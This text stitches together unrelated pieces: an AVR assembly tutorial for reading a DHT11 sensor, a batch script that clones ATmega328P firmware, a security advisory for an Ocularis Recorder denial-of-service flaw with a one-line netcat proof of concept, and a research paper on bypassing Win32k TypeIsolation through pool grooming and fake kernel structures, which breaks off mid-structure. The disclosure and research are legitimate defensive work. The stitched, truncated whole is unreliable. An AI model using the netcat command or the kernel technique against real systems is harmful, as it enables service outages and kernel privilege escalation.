We will not measure the exact duration of each interval; it is enough to realize that if the second “half-bit” is shorter than the first, a zero was encoded, and if the second “half-bit” is longer, a one was encoded. We have 40 bits in total, each bit is encoded by two pulses, so we need to read 80 intervals. Once we have read the 80 intervals we will compare them pairwise, the first “half-bit” against the second.

It all seems simple; so what does the microcontroller have to do to read the data from the sensor? It turns out we need to yank the pin low, then simply read the whole long message from the sensor on that same pin. As we go, we will split the message into “half-bits”, determining where a zero bit is sent and where a one. Then we assemble the resulting bits into bytes, which will be the expected humidity and temperature data.
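
The decoding rule itself is easy to prototype on the host before writing any AVR code. A minimal Python sketch (the interval numbers are whatever the counting loops produce; none of this runs on the microcontroller) could be:

def decode_dht11(intervals):
    # intervals: 80 loop counts, alternating first ("low") and second ("high") half-bit
    assert len(intervals) == 80
    bits = [1 if high > low else 0
            for low, high in zip(intervals[0::2], intervals[1::2])]   # longer second half-bit = "1"
    data = []
    for i in range(0, 40, 8):
        byte = 0
        for bit in bits[i:i + 8]:
            byte = (byte << 1) | bit
        data.append(byte)
    rh_int, rh_dec, t_int, t_dec, checksum = data
    if (rh_int + rh_dec + t_int + t_dec) & 0xFF != checksum:          # checksum per the datasheet
        raise ValueError("checksum mismatch")
    return rh_int, rh_dec, t_int, t_dec

# e.g. decode_dht11(counts) -> (34, 0, 21, 0) for 34% humidity and 21 C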

OK, we have started writing the code; first let's check whether the sensor works at all. To do that we simply hold the line low for 20 ms and then look at the line with the logic analyzer to see what comes out of it.

Definitions:

;==========		DEFINES =======================================
; definitions for the port the DHT11 is connected to
				.EQU DHT_Port=PORTD
				.EQU DHT_InPort=PIND
				.EQU DHT_Pin=PORTD2
				.EQU DHT_Direction=DDRD
				.EQU DHT_Direction_Pin=DDD2

				.DEF Tmp1=R16
				.DEF USART_ByteR=R17		; variable holding the byte to send via USART
				.DEF Tmp2=R18
				.DEF USART_BytesN=R19		; variable - how many bytes to send to the USART
				.DEF Tmp3=R20
				.DEF Cycle_Count=R21		; loop counter in Expect_X
				.DEF ERR_CODE=R22			; error code returned from subroutines
				.DEF N_Cycles=R23			; counter in READ_CYCLES
				.DEF ACCUM=R24
				.DEF Tmp4=R25
As I already wrote, the sensor itself is connected to pin 2 of port D. On the Arduino Uno this is digital pin D2 (check the Arduino pinout if in doubt).

We do everything head-on: initialize the pin as an output, drive it low, wait 20 milliseconds, release the line, switch the pin to input mode, and wait for signals to appear on the pin.

;============	DHT11 INIT =======================================
; right after the init we must !!!! read the sensor's response and then the data itself
DHT_INIT:		CLI	; once more, just in case - this is a time-critical section

				; saved X for use in READ_CYCLES - there is no time to initialize it there
				LDI XH, High(CYCLES)	; loaded the high byte of the CYCLES address
				LDI XL, Low (CYCLES)	; loaded the low byte of the CYCLES address

				LDI Tmp1, (1<<DHT_Direction_Pin)
				OUT DHT_Direction, Tmp1			; port D, pin 2 as output

				LDI Tmp1, (0<<DHT_Pin)
				OUT DHT_Port, Tmp1			; drove the line to 0 

				RCALL DELAY_20MS		; wait 20 milliseconds

				LDI Tmp1, (1<<DHT_Pin)		; released the line - set it to 1
				OUT DHT_Port, Tmp1	

				RCALL DELAY_10US		; wait 10 microseconds

				
				LDI Tmp1, (0<<DHT_Direction_Pin)		; port D, pin 2 as input
				OUT DHT_Direction, Tmp1	
				LDI Tmp1,(1<<DHT_Pin)		; enabled the internal pull-up, together with the external resistor on the line
				OUT DHT_Port, Tmp1		

; wait for the sensor's response - it must pull the line low for 80 us and release it for 80 us

Let's look with the analyzer: did the sensor answer?

Yes, there is an answer; the signals after our initial 20 ms pulse are the sensor's response. To capture the transmission I used a Chinese clone of the USBEE AX Pro connected to the sensor's signal wire.

Let's stretch the time scale so that we can see the end of our 20 ms pulse and the beginning of the sensor's message. Everything is as in the datasheet: first the sensor drives the line low and then high for 80 µs each, then it starts sending bits; in this case the second “half-bit” carries a “0”.

So the sensor works and has sent us data; now we need to read that data correctly. Since this is a learning exercise, we will solve it in the most straightforward way. At the moment the sensor answers, i.e. at the transition from high to low, we start a loop with a counter of how many times the loop has run. Inside the loop we constantly watch the level on the pin, waiting for the signal to go back to the high level, thereby measuring the duration of the first “half-bit”. Our microcontroller runs at 16 MHz, so within, say, 50 microseconds it manages to execute about 800 instructions. When the line goes high we carefully exit the loop, and the number of loop iterations we counted is stored in a variable.

After the signal line has gone high we do the same thing: count loop iterations until the sensor starts transmitting the next bit and pulls the line low. Fortunately, we do not need to know the exact duration of the pulses; it is enough to know that one interval is longer than the other. Clearly, if the sensor transmits a “zero” bit, the duration of the second “half-bit”, and therefore the number of iterations we count, will be smaller than for the first “half-bit”. If the sensor sent a “one” bit, the number of iterations counted during the second half-bit will be greater than during the first.

And so that we do not hang forever if the sensor suddenly fails to answer or glitches, the loop itself runs for a fixed period that is guaranteed to be longer than the longest possible message, so that if the sensor does not answer we can exit on a timeout.

The code below shows the case where the line was low and we count how many times we sampled the controller's pin in the loop until the sensor switched the line to one.

;=============	EXPECT 1 =========================================
; spin in a loop waiting for the desired state on the pin
; when it appears - exit
; report how many iterations we waited
; or an error code if we timed out
EXPECT_1:		LDI Cycle_Count, 0			; loaded the cycle counter
			LDI ERR_CODE, 2			; error 2 - exit on timeout

			ldi  Tmp1, 2			; loaded
			ldi  Tmp2, 169			; the 80 us delay

EXP1L1:			INC Cycle_Count			; incremented the cycle counter

			IN Tmp3, DHT_InPort		; read the port
			SBRC Tmp3, DHT_Pin	; if it is 1
			RJMP EXIT_EXPECT_1	; then exit
			dec  Tmp2			; otherwise keep spinning in the delay
			brne EXP1L1
			dec  Tmp1
			brne EXP1L1
			NOP					; the timeout exit ends up here
			RET

EXIT_EXPECT_1:		LDI ERR_CODE, 1			; error 1 means all is fine, Cycle_Count holds the count
			RET

A similar subroutine is used to count how many iterations pass while the sensor takes the line from the zero state back to one.

To generate the time delays we use the same approach as when blinking the LED: pick the parameters of an empty loop that produce the required pause. I used a dedicated calculator; if you wish, you can count the working instructions by hand.

There is quite a lot of memory in our controller, a whole 2 (two) kilobytes, so we will not be stingy with it and will simply store the counter values for all 80 intervals (40 bits, 2 intervals per bit) in memory.

Let's declare the variable:

CYCLES: .byte 80 ; buffer for storing the interval counts

And store all of the counted intervals in memory:

;============== READ CYCLES ====================================
; read the bits from the sensor and store the counts in CYCLES 
READ_CYCLES:	LDI N_Cycles, 80			; read 80 intervals
READ:		NOP
		RCALL EXPECT_1				; the low interval has been counted out
		ST X+, Cycle_Count			; stored the cycle count 
			
		RCALL EXPECT_0
		ST X+, Cycle_Count			; stored the cycle count 
		
		DEC N_Cycles				; decremented the counter
		BRNE READ					
		RET					; all intervals read

Now, for debugging, let's check how well the interval durations were counted and whether we really did read data from the sensor. Clearly, the counted iterations for the first “half-bit” should be roughly the same across all bit frames, while the count for the second “half-bit” will be either noticeably smaller or noticeably larger.

To send the data to the big computer we use the controller's USART, which pushes the data over the USB cable into a terminal program such as PuTTY. Again we do it head-on: stuff a byte into the appropriate USART register and wait until it has been transmitted. For convenience I also wrote a couple of small subroutines: send several bytes starting at the address in Y, and move to a new line in the terminal for neatness.

;============	SEND 1 BYTE VIA USART =====================
SEND_BYTE:	NOP
SEND_BYTE_L1:	LDS Tmp1, UCSR0A
		SBRS Tmp1, UDRE0			; if the data register is empty
		RJMP SEND_BYTE_L1
		STS UDR0, USART_ByteR		; then send the byte from R17
		NOP
		RET				

;============	SEND CRLF VIA USART ===============================
SEND_CRLF:	LDI USART_ByteR, $0D
		RCALL SEND_BYTE	
		LDI USART_ByteR, $0A
		RCALL SEND_BYTE
		RET			

;============	SEND N BYTES VIA USART ============================
; Y - what to send, USART_BytesN - how many bytes
SEND_BYTES:	NOP
SBS_L1:		LD USART_ByteR, Y+
		RCALL SEND_BYTE
		DEC USART_BytesN
		BRNE SBS_L1
		RET

Having sent the counts for all 80 intervals to the terminal, we can try to assemble the actual data bits. We do it as the textbook, i.e. the datasheet, says: compare the iteration count of the first “half-bit” with that of the second, pairwise. If the second half-bit is shorter, a zero was encoded; if it is longer, a one. After the comparison the bits are accumulated in the accumulator and stored to memory byte by byte, starting at the address BITS.

;=============	GET BITS ===============================================
; turn CYCLES into bytes in BITS				
GET_BITS:			LDI Tmp1, 5			; counters: for five bytes
				LDI Tmp2, 8			; and for each bit
				LDI ZH, High(CYCLES)	; loaded the high byte of the CYCLES address
				LDI ZL, Low (CYCLES)	; loaded the low byte of the CYCLES address
				LDI YH, High(BITS)	; loaded the high byte of the BITS address
				LDI YL, Low (BITS)	; loaded the low byte of the BITS address

ACC:				LDI ACCUM, 0			; initialized the accumulator
				LDI Tmp2, 8			; for each bit

TO_ACC:				LSL ACCUM				; shifted left
				LD Tmp3, Z+			; read the count for interval [i]
				LD Tmp4, Z+			; and for interval [i+1]
				CP Tmp3, Tmp4			; compare the first half-bit with the second: positive means the bit is 0, negative means the bit is 1
				BRPL J_SHIFT		; if positive (0), just shift	
				ORI ACCUM, 1			; if negative (1), set the low bit
J_SHIFT:			DEC Tmp2				; repeat for 8 bits
				BRNE TO_ACC
				ST Y+, ACCUM			; stored the accumulator
				DEC Tmp1				; for five bytes
				BRNE ACC
				RET

So now we have assembled in memory, starting at the BITS label, the five bytes that the sensor transmitted. But working with them in this format is not very convenient, because in memory it looks roughly like
34002100XX, where 34 is the integer part of the humidity, 00 the fractional part of the humidity, 21 the temperature, 00 again the fractional part of the temperature, and XX the checksum. What we would like to print in the terminal is something nice like “Temperature = 21.00”. So, for convenience, let's pull the data apart into separate variables.

Definitions

H10:			.byte 1		; number - integer part of the humidity
H01:			.byte 1		; number - fractional part of the humidity
T10:			.byte 1		; number - integer part of the temperature in C
T01:			.byte 1		; number - fractional part of the temperature

And copy the bytes from BITS into the corresponding variables:

;============	GET HnT DATA =========================================
; pull the H10... values out of BITS
; !!! a small hack, because H10 and the rest lie consecutively in memory

GET_HnT_DATA:	NOP

				LDI ZH, HIGH(BITS)
				LDI ZL, LOW(BITS)
				LDI XH, HIGH(H10)
				LDI XL, LOW(H10)
												; TODO - switch this to a proper loop counter
				LD Tmp1, Z+			; read
				ST X+, Tmp1			; stored
				
				LD Tmp1, Z+			; read
				ST X+, Tmp1			; stored

				LD Tmp1, Z+			; read
				ST X+, Tmp1			; stored

				LD Tmp1, Z+			; read
				ST X+, Tmp1			; stored

				RET

After that we convert the numbers into ASCII codes so the data can be read normally in a terminal, add the labels (e.g. “temperature”, taken from flash), and send it all to the COM port, into the terminal.

PuTTY with the data
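
Instead of PuTTY, the same output can be read with a few lines of Python on the PC side (this assumes the pyserial package; the port name and the baud rate are placeholders and must match your USB-TTL adapter and whatever USART0_INIT configures):

import serial                      # pip install pyserial

PORT = "COM7"                      # placeholder: whichever port the USB-TTL adapter gets
BAUD = 9600                        # placeholder: must match the USART configuration

with serial.Serial(PORT, baudrate=BAUD, timeout=2) as com:
    while True:
        line = com.readline().decode(errors="replace").strip()
        if line:
            print(line)            # e.g. "Temperature = 21.00"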

To measure the temperature regularly, we add an endless loop with a delay of about 1200 milliseconds, since the DHT11 datasheet says it is not recommended to poll the sensor more than once per second.

The main loop then looks roughly like this:

;============	MAIN
			;!!! main entry point
RESET:			NOP		

			; internal hardware init
			CLI		; we do not need interrupts for now
				
			; stack init		
			LDI Tmp1, Low(RAMEND)
			OUT SPL, Tmp1
			LDI Tmp1, High(RAMEND)
			OUT SPH, Tmp1

			RCALL USART0_INIT

			; init data
			RCALL COPY_STRINGS		; copied the strings into RAM
			RCALL TEST_DATA			; prepared the test data

loop:				NOP						; spinning in the endless loop ....
				; external hardware init
				RCALL DHT_INIT
				; here we have the sensor's acknowledgement and must read the bits quickly
				RCALL READ_CYCLES
				; the time-critical section is over...
				
				; test - send CYCLES to the USART		
				;RCALL TEST_CYCLES
				
				; extract the bits from the message
				RCALL GET_BITS
				
				; test - send BITS to the USART
				;RCALL TEST_BITS  
				
				; turn BITS into numeric data
				RCALL GET_HnT_DATA
				
				; test - send 4 bytes starting at H10 to the USART
				;RCALL TEST_H10_T01
				
				; prepared the temperature and humidity as ASCII		
				RCALL HnT_ASCII_DATA_EX
				
				; send the formatted temperature (label plus ASCII data) to the USART
				RCALL PRINT_TEMPER
				; send the formatted humidity (label plus ASCII data) to the USART
				RCALL PRINT_HUMID
				; new line for neatness				
				RCALL SEND_CRLF
							
				RCALL DELAY_1200MS				; repeat every 1.2 seconds 
				rjmp loop		; loop forever

We flash the board, connect the USB-TTL cable (converter) to the computer, start the terminal, select the right virtual COM port, and enjoy our new digital thermometer. As a sanity check you can warm the sensor in your hand; for me the temperature rises while the humidity, oddly enough, drops.

Related links:
AVR Delay Calc
How to connect an Arduino for programming in Atmel Studio 7
DHT11 Datasheet
ATmega DataSheet
Atmel AVR 8-bit Instruction Set
Atmel Studio
Example code on GitHub

AVR(Arduino) Firmware Duplicator

Windows script to make an exact copy of AVR (Arduino) firmware including the bootloader, user program, fuses and EEPROM.

Things used in this project

Hardware components: Atmel ATmega328P-PU

Story

Code

windows_read___copy__xp__vista_tested_.

REM
prompt $G
ECHO OFF
CLS
ECHO.
ECHO BATCH COPY ATMEGA328P-PU VIA ARDUINO-ISP ON com4
CD C:\Program Files\Arduino_105\hardware\tools\avr\bin
ECHO ENSURE MASTER CHIP IS IN THE READER
ECHO CTRL+C to abort OR PRESS Any key to begin copy...
ECHO.
pause >nul
ECHO Creating hexadecimal binary files of ATmel328P contents...
>stdout.log 2>&1 (
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U flash:r:%temp%\backup_flash.hex:i
ECHO flash has been SAVED to backup_flash.hex
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U eeprom:r:%temp%\backup_eeprom.hex:i
ECHO eeprom has been SAVED to backup_eeprom.hex
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U hfuse:r:%temp%\backup_hfuse.hex:i
ECHO hfuse has been SAVED to backup_hfuse.hex
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U lfuse:r:%temp%\backup_lfuse.hex:i
ECHO lfuse has been SAVED to backup_lfuse.hex
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U efuse:r:%temp%\backup_efuse.hex:i
ECHO efuse has been SAVED to backup_efuse.hex
)
ECHO Hexadecimal files created.
ECHO.
CD C:\Program Files\Arduino_105\hardware\tools\avr\bin
ECHO INSERT THE NEW CHIP now!
ECHO PRESS Any key to write new chip...
pause >nul
REM Note that the path cannot contain the drive letter "C:" so you cannot use %temp% as previously
REM Reference:http://savannah.nongnu.org/bugs/index.php Bug report #39230
REM.
>>stdout.log 2>&1 (
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U flash:w:\Users\owner\AppData\Local\Temp\backup_flash.hex
ECHO backup_flash.hex WRITTEN
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U eeprom:w:\Users\owner\AppData\Local\Temp\backup_eeprom.hex
ECHO backup_eeprom.hex WRITTEN
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U hfuse:w:\Users\owner\AppData\Local\Temp\backup_hfuse.hex
ECHO hfuse WRITTEN
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U lfuse:w:\Users\owner\AppData\Local\Temp\backup_lfuse.hex
ECHO lfuse WRITTEN
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U efuse:w:\Users\owner\AppData\Local\Temp\backup_efuse.hex
ECHO efuse WRITTEN ... this may change from 05 to 07 with BOD being disabled by AVRDUDE
)
ECHO.
ECHO Chip duplication and verification is complete.
ECHO Starting Notepad editor to display log file.
start notepad C:\Program Files\Arduino_105\hardware\tools\avr\bin\stdout.log
ECHO.
ECHO Press Any key to close this window...
pause >nul

 

Ocularis Recorder VMS_VA Denial of Service Vulnerability

OVERVIEW

Talos is disclosing a denial-of-service vulnerability in the Ocularis Recorder. Ocularis is a video management software (VMS) platform used in a variety of settings, from convenience stores, to city-wide deployments. An attacker can trigger this vulnerability by crafting a malicious network packet that causes a process to terminate, resulting in a denial of service.

DETAILS

An exploitable denial-of-service vulnerability exists in the Ocularis Recorder functionality of Ocularis 5.5.0.242. A specially crafted TCP packet can cause a process to terminate, resulting in denial of service.

The VMS_VA server process is listening for incoming TCP connections on a port in the range of 60801-65535. When a client connects to it and sends any unexpected data, the binary will respond with “Hello World!” The binary has a check to see whether the received data starts with “dispose”. If it does, the server process kills itself. There is no authentication required for this command to go through. Any attacker with network access to the server application can use this to execute a denial-of-service attack.


Ocularis Recorder VMS_VA Denial of Service Vulnerability

JUNE 5, 2018 CVE NUMBER CVE-2018-3852

Summary

An exploitable denial of service vulnerability exists in the Ocularis Recorder functionality of Ocularis 5.5.0.242. A specially crafted TCP packet can cause a process to terminate resulting in denial of service. An attacker can send a crafted TCP packet to trigger this vulnerability.

Tested Versions

Ocularis Recorder 5.5.0.242

Product URLs

https://onssi.com/

CVSSv3 Score

7.5 — CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-250 — Execution with Unnecessary Privileges

Details

This binary listens for incoming TCP connections. When a client connects to this binary and sends any unexpected data, the binary will respond with “Hello World!”. If the server receives the dispose command, it will terminate the VMS_VA process.

this.tcpListener = new TcpListener(IPAddress.Any, 60801 + ConfigID);
Thread thread = new Thread(new ThreadStart(this.ListenForClients))
{
    Name = "VA CommServer V4 Listener"
};
..........
if (str.StartsWith("dispose"))
{
    this.Running = false;
    bytes = Encoding.Default.GetBytes("Ack!");
}

The binary has a check to see if the received data starts with “dispose”. If it does, the “this.Running” variable will be set to false, which results in the process killing itself. There is no authentication required for this command to go through.

Crash Information

N/A

Exploit Proof-of-Concept

$ echo "dispose" | nc -nv 192.168.56.102 60801
192.168.56.102 60801 open
Ack!

Mitigation

This vulnerability can be mitigated by blocking inbound connections to VMS_VA.exe. It is unclear whether this will have any adverse effect on the Ocularis Recorder module, as the product documentation explicitly states to allow inbound traffic to this binary.

Timeline

2018-03-05 — Vendor Disclosure
2018-06-04 — Public Release


 

Save and Reborn GDI data-only attack from Win32k TypeIsolation

1 Background

In recent years, the exploitation of GDI objects to achieve arbitrary kernel memory reads and writes has become more and more useful in kernel exploitation. In many vulnerability classes, such as pool overflows, arbitrary writes, out-of-bounds writes, use-after-free, and double free, you can use GDI objects to read and write arbitrary memory. We call this the GDI data-only attack.

Microsoft introduced Win32k TypeIsolation after the Windows 10 build 1709 release to mitigate GDI data-only attacks in kernel exploitation. While reversing win32kbase.sys I discovered a mistake in Win32k TypeIsolation that makes the GDI data-only attack work again in certain common vulnerabilities. In this paper, I will share this new attack scenario.

Debug environment:

OS:

Windows 10 rs3 16299.371

FILE:

Win32kbase.sys 10.0.16299.371

2 GDI data-only attack

The GDI data-only attack is one of the common methods used in kernel exploitation. By modifying GDI object member variables through common vulnerabilities, you can use the GDI APIs in win32k to achieve arbitrary memory reads and writes. At present, the two GDI objects commonly used in GDI data-only attacks are Bitmap and Palette. An important structure of Bitmap is:


typedef struct _SURFOBJ {
    DHSURF dhsurf;
    HSURF hsurf;
    DHPDEV dhpdev;
    HDEV hdev;
    SIZEL sizlBitmap;
    ULONG cjBits;
    PVOID pvBits;
    PVOID pvScan0;
    LONG lDelta;
    ULONG iUniq;
    ULONG iBitmapFormat;
    USHORT iType;
    USHORT fjBitmap;
} SURFOBJ, *PSURFOBJ;

An important structure of Palette is:


typedef struct _PALETTE64
{
    BASEOBJECT64 BaseObject;
    FLONG flPal;
    ULONG32 cEntries;
    ULONG32 ulTime;
    HDC hdcHead;
    ULONG64 hSelected;
    ULONG64 cRefhpal;
    ULONG64 cRefRegular;
    ULONG64 ptransFore;
    ULONG64 ptransCurrent;
    ULONG64 ptransOld;
    ULONG32 unk_038;
    ULONG64 pfnGetNearest;
    ULONG64 pfnGetMatch;
    ULONG64 ulRGBTime;
    ULONG64 pRGBXlate;
    PALETTEENTRY *pFirstColor;
    struct _PALETTE *ppalThis;
    PALETTEENTRY apalColors[3];
} PALETTE64;

In the kernel structures of Bitmap and Palette, the two member variables relevant to the GDI data-only attack are Bitmap->pvScan0 and Palette->pFirstColor. Both point to the Bitmap's and Palette's data fields, and you can read or write data in those fields through the GDI APIs. As long as we modify these two member variables to point to an arbitrary memory address by triggering a vulnerability, we can use GetBitmapBits/SetBitmapBits or GetPaletteEntries/SetPaletteEntries to read and write that address.
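
For reference, the read/write pair behaves like this from user mode. This is a minimal Python/ctypes sketch on a Windows host: on an unmodified bitmap the two calls simply copy pixel data in and out of the object's own buffer, and the attack works precisely because pvScan0 decides where that copy reads from or writes to.

import ctypes
from ctypes import wintypes

gdi32 = ctypes.WinDLL("gdi32")
gdi32.CreateBitmap.restype = wintypes.HBITMAP
gdi32.SetBitmapBits.argtypes = (wintypes.HBITMAP, wintypes.DWORD, ctypes.c_void_p)
gdi32.GetBitmapBits.argtypes = (wintypes.HBITMAP, wintypes.LONG, ctypes.c_void_p)
gdi32.DeleteObject.argtypes = (wintypes.HGDIOBJ,)

width, height, bpp = 4, 4, 32
size = width * height * bpp // 8

hbm = gdi32.CreateBitmap(width, height, 1, bpp, None)    # an ordinary bitmap object

payload = (ctypes.c_ubyte * size)(*range(size))
gdi32.SetBitmapBits(hbm, size, payload)                  # the "write" direction
readback = (ctypes.c_ubyte * size)()
gdi32.GetBitmapBits(hbm, size, readback)                 # the "read" direction

print(bytes(readback[:8]))                               # the first bytes we just wrote
gdi32.DeleteObject(hbm)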

There are already many technical papers on the Internet about using Bitmap and Palette to carry out the GDI data-only attack; since it is not the focus of this paper, I will not go deeper here. The relevant information can be found in the references in the fifth part.

3 Win32k TypeIsolation

The GDI data-only attack greatly reduces the difficulty of kernel exploitation and can be used in most common vulnerability classes. Microsoft added a new mitigation after Windows 10 RS3 build 1709, Win32k TypeIsolation, which manages GDI objects through a doubly linked list and separates the header of the GDI object from its data field. This not only mitigates the pool-fengshui style of exploit, which creates a predictable pool layout, uses a GDI object to occupy the pool hole, and modifies its member variables through a vulnerability, but also mitigates attack scenarios that modify other member variables of the GDI object header to enlarge the controllable range of the data field, because the header and the data field are no longer adjacent.

About win32k typeisolation mechanism can refer to the following figure:

Here I will explain the important parts of the mechanism of win32k typeisolation. The detailed operation mechanism of win32k typeisolation, including the allocation, and release of GDI object, can be referred to in the fifth part.

In win32k typeisolation, GDI object is managed uniformly through the CSectionEntry doubly linked list. The view field points to a 0x28000 memory space, and the head of the GDI object is managed here. The view field is managed by view array, and the array size is 0x1000. When assigning to a GDI object, RTL_BITMAP is used as an important basis for assigning a GDI object to a specified view field.

In CSectionEntry, bitmap_allocator points to CSectionBitmapAllocator, and xored_view, xor_key, xored_rtl_bitmap are stored in CSectionBitmapAllocator, where xored_view ^ xor_key points to the view field and xored_rtl_btimap ^ xor_key points to RTL_BITMAP.

In RTL_BITMAP, bitmap_buffer_ptr points to BitmapBuffer, and BitmapBuffer records the state of the view field: 0 means idle and 1 means in use. When a GDI object is requested, the code traverses the CSectionEntry list through win32kbase!gpTypeIsolation and checks via the CSectionBitmapAllocator whether the current view field has free space. If there is free space, the new GDI object header is placed in the view field.
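
As a rough mental model of that allocation walk, here is a toy Python sketch (not the win32kbase.sys implementation; slot counts and names are only illustrative):

class SectionEntry:
    SLOTS = 0x1000                       # slot count per view, as described above

    def __init__(self):
        self.view = [None] * self.SLOTS  # stands in for the 0x28000-byte view region
        self.busy = [False] * self.SLOTS # stands in for the RTL_BITMAP state bits

    def allocate(self, obj_header):
        for i, used in enumerate(self.busy):
            if not used:                 # first free bit wins
                self.busy[i] = True
                self.view[i] = obj_header
                return i
        return None                      # this view is full

class TypeIsolation:
    def __init__(self):
        self.entries = [SectionEntry()]  # stands in for the gpTypeIsolation list

    def allocate(self, obj_header):
        for entry in self.entries:       # walk the entry list looking for room
            slot = entry.allocate(obj_header)
            if slot is not None:
                return entry, slot
        entry = SectionEntry()           # every view full: a new CSectionEntry is created
        self.entries.append(entry)
        return entry, entry.allocate(obj_header)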

I did some reverse-engineering research into the implementation of GDI object allocation and release in the CTypeIsolation and CSectionEntry classes, and I found a mistake. TypeIsolation traverses the CSectionEntry doubly linked list, uses the CSectionBitmapAllocator to determine the state of the view field, and manages the GDI object SURFACE stored in the view field, but it does not check the validity of the CSectionEntry->view and CSectionEntry->bitmap_allocator pointers. In other words, if we can construct a fake view and a fake bitmap_allocator, and use a vulnerability to make CSectionEntry->view and CSectionEntry->bitmap_allocator point to the fake structures, we can re-use GDI objects to complete the data-only attack.

4 Save and reborn gdi data-only attack!

In this section, I would like to share the idea behind this attack scenario. HEVD is a practice driver developed by HackSysTeam that contains typical kernel vulnerabilities. There is an arbitrary write vulnerability in HEVD, and we will use it as the example for this attack scenario.

Attack scenario:

First, look at the allocation of CSectionEntry. CSectionEntry is allocated from the session paged pool with size 0x40; the pool allocation is implemented in NSInstrumentation::CSectionEntry::Create().


.text:00000001C002AC8A mov edx, 20h ; NumberOfBytes

.text:00000001C002AC8F mov r8d, 6F736955h ; Tag

.text:00000001C002AC95 lea ecx, [rdx+1] ; PoolType

.text:00000001C002AC98 call cs:__imp_ExAllocatePoolWithTag //Allocate 0x40 session paged pool

In other words, we can still use pool fengshui to create a predictable session paged pool hole, which will then be occupied by a CSectionEntry. Therefore, in the HEVD arbitrary write exploit scenario, we use tagWND to create a stable pool hole and use HMValidateHandle to leak the tagWND kernel object address. Because the vulnerability in this example is an arbitrary write, leaking the address of the kernel object makes it easier to follow this attack scenario; in many attack scenarios we only need pool fengshui to create a predictable pool.


Kd> g//make a stable pool hole by using tagWND

Break instruction exception - code 80000003 (first chance)

0033:00007ff6`89a61829 cc int 3

Kd> p

0033:00007ff6`89a6182a 488b842410010000 mov rax,qword ptr [rsp+110h]

Kd> p

0033:00007ff6`89a61832 4839842400010000 cmp qword ptr [rsp+100h],rax

Kd> r rax

Rax=ffff862e827ca220

Kd> !pool ffff862e827ca220

Pool page ffff862e827ca220 region is Unknown

Ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04

Ffff862e827ca150 size: 10 previous size: 150 (Free) Free

Ffff862e827ca160 size: b0 previous size: 10 (Free ) Uscu

*ffff862e827ca210 size: 40 previous size: b0 (Allocated) *Ustx Process: ffffd40acb28c580

Pooltag Ustx : USERTAG_TEXT, Binary : win32k!NtUserDrawCaptionTemp

Ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8

Ffff862e827ca330 size: e0 previous size: e0 (Allocated) Gla8

0xffff862e827ca220 is a stable session paged pool hole, and 0xffff862e827ca220 will be released later, in a free state.


Kd> p

0033:00007ff7`abc21787 488b842498000000 mov rax,qword ptr [rsp+98h]

Kd> p

0033:00007ff7`abc2178f 48398424a0000000 cmp qword ptr [rsp+0A0h],rax

Kd> !pool ffff862e827ca220

Pool page ffff862e827ca220 region is Unknown

Ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04

Ffff862e827ca150 size: 10 previous size: 150 (Free) Free

Ffff862e827ca160 size: b0 previous size: 10 (Free) Uscu

*ffff862e827ca210 size: 40 previous size: b0 (Free ) *Ustx

Pooltag Ustx : USERTAG_TEXT, Binary : win32k!NtUserDrawCaptionTemp

Ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8

Ffff862e827ca330 size: e0 previous size: e0 (Allocated) Gla8

Now we need to make a CSectionEntry occupy 0xffff862e827ca220. This requires a feature of TypeIsolation. As mentioned in the second section, when a GDI object is requested, the code traverses the CSectionEntry list and checks whether there is free space in the view field; if the view field of a CSectionEntry is full, the traversal continues to the next CSectionEntry, but if the view fields of all the CSectionEntries in the CTypeIsolation doubly linked list are full, NSInstrumentation::CSectionEntry::Create is invoked to create a new CSectionEntry.

Therefore, after we have finished creating the pool hole, we allocate a large number of GDI objects to fill up all the CSectionEntries' view fields, ensuring that a new CSectionEntry is created and occupies the 0x40 pool hole.


Kd> g//create a large number of GDI objects, 0xffff862e827ca220 is occupied by CSectionEntry

Kd> !pool ffff862e827ca220

Pool page ffff862e827ca220 region is Unknown

Ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04

Ffff862e827ca150 size: 10 previous size: 150 (Free) Free

Ffff862e827ca160 size: b0 previous size: 10 (Free) Uscu

*ffff862e827ca210 size: 40 previous size: b0 (Allocated) *Uiso

Pooltag Uiso : USERTAG_ISOHEAP, Binary : win32k!TypeIsolation::Create

Ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8 ffff86b442563150 size:

Next we need to construct the fake CSectionEntry->view and fake CSectionEntry->bitmap_allocator and use the Arbitrary Write to modify the member-variable pointer in the CSectionEntry in the session paged pool hole to point to the fake struct we constructed.

The view fields of the new CSectionEntries created when we allocated a large number of GDI objects may already be fully or partially filled with SURFACEs. If we construct the fake structures so that the view field appears empty, we can deceive TypeIsolation into placing a GDI object's SURFACE at a known location.

We use VirtualAllocEx to allocate the memory in the userspace to store the fake struct, and we set the userspace memory property to READWRITE.


Kd> dq 1e0000//fake pushlock

00000000`001e0000 00000000`00000000 00000000`0000006c

Kd> dq 1f0000//fake view

00000000`001f0000 00000000`00000000 00000000`00000000

00000000`001f0010 00000000`00000000 00000000`00000000

Kd> dq 190000//fake RTL_BITMAP

00000000`00190000 00000000`000000f0 00000000`00190010

00000000`00190010 00000000`00000000 00000000`00000000

Kd> dq 1c0000//fake CSectionBitmapAllocator

00000000`001c0000 00000000`001e0000 deadbeef`deb2b33f

00000000`001c0010 deadbeef`deadb33f deadbeef`deb4b33f

00000000`001c0020 00000001`00000001 00000001`00000000

Among them, 0x1f0000 points to the view field and 0x1c0000 points to the CSectionBitmapAllocator; the fake view field is used to store the GDI object. The CSectionBitmapAllocator structure needs to be constructed carefully, because we use it to convince TypeIsolation that the CSectionEntry we control has a free view slot.


Typedef struct _CSECTIONBITMAPALLOCATOR {

PVOID pushlock; // + 0x00

ULONG64 xored_view; // + 0x08

ULONG64 xor_key; // + 0x10

